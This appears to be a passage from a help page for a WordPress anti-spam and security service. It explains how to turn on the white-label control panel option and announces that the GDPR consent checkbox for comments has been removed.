      1. Ensure your Unlimited plan and the Extra Package for your Anti-Spam or Security services have been purchased.
      2. In the upper right corner of your Dashboard screen go to your ProfileSettings Whitelabel Database.
      3. Switch the White label option to On and fill in the following fields and press the Save button.

      Congratulations! You can now invite your customers to their new control panel.

      How to connect the White Label option for Multisite/Multiuser/WPMS

      In case you are using a Multisite/Multiuser/WPMS version of WordPress, check out these instructions.

    • GDPR compliance notification in comments is no longer supported

      GDPR compliance notification in comments is no longer supported

      A while back, you might have seen a checkbox in the comments of a WordPress website saying that the site visitor had read the agreement and agreed to the site’s GDPR policy. Without the checkbox, you couldn’t submit a comment.

      The feature wasn’t very popular and we decided to remove it. In the future. If you need to comply with GDPR requirements you can use other solutions to inform users.